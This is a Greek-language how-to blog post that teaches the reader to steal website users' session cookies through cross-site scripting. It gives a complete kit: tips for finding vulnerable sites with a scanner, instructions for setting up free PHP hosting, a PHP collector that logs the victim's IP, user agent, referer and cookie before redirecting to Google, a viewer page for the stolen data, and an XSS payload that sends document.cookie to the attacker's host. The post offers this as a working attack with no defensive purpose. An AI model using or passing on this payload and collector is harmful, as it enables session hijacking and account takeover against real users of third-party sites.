Πώς να κλέψουμε τα cookies χρησιμοποιώντας XSS

Κατηγορία: How To | Tricks & Tips, Web Developing Views:

xss-threat3Ένας τρόπος για να μπορέσουμε να βρούμε τους κωδικούς χρηστών από κάποια ιστοσελίδα είναι μέσω Cross Site Scripting (XSS).Θα πρέπει φυσικά η ιστοσελίδα να είναι vulnerable σε αυτού τους είδους τις επιθέσεις.Για να βρούμε ποιές ιστοσελίδες παρουσιάζουν αυτού του είδους την αδυναμία αρκεί να χρησιμοποιήσουμε το πρόγραμμα Acunetix Vulnerability Scanner.

Ποιά εργαλεία θα χρειαστούμε?

Μόλις βρούμε τον στόχο μας τότε θα χρειαστούμε τα ακόλουθα:

  1. Έναν λογαριασμό σε ένα hosting site
  2. 2 σελίδες με κώδικα php
  3. Την ιστοσελίδα που είναι vulnerable

Μπορούμε να βρούμε αρκετά hosting sites που υποστηρίζουν php όπως:

www.000webhost.com

http://www.free-webhosts.com/free-php-webhosting.php

Δημιουργούμε λοιπόν έναν λογαριασμό σε κάποιο free hosting site για να ανεβάσουμε τις php σελίδες μας.Η μία σελίδα θα έχει το όνομα vb.php και θα περιέχει τον κώδικα:

<head>
<meta http-equiv=”Content-Language” content=”it”>
<title>Cookies Stealther</title>
</head>

<body bgcolor=”#C0C0C0″>

<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p>
<p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p>
<p align=”left”>&nbsp;</p>

</body>

και η άλλη σελίδα θα έχει το όνομα documents.php και θα περιέχει τον εξής κώδικα:

<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date(”Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer: “.$referer.”<br>Session: “.$data.”<br><br><br>”;

$file = fopen(’vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(”Location:
http://www.google.com“);

?>

Η σελίδα vb.php χρησιμοποιείται για να εμφανίσει σε εμάς τα cookies που έχει κλέψει και άλλες πληροφορίες ενώ η σελίδα documents.php χρησιμοποιείται για να πάρει πληροφορίες από τα πιθανά θύματα όπως η IP τους διεύθυνση κτλ.

Τώρα στην ιστοσελίδα που είναι vulnerable σε XSS θα πρέπει να εισάγουμε το ακόλουθο script:

http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location=”http://www.example-of-hosting/documents.php?c=”+document.cookie;</script>

Τα μέλη που θα πέσουν θύματα αυτής της επίθεσης θα κατευθυνούν στο site της google (μπορούμε στο αρχείο documents.php να βάλουμε όποια άλλη σελίδα θέλουμε) και εμείς θα μπορούμε να δούμε τα cookies στο αρχείο vb.php

πηγή:datalibrary.wordpress.com

` Ετικέτες: , , , ,

Comments are closed.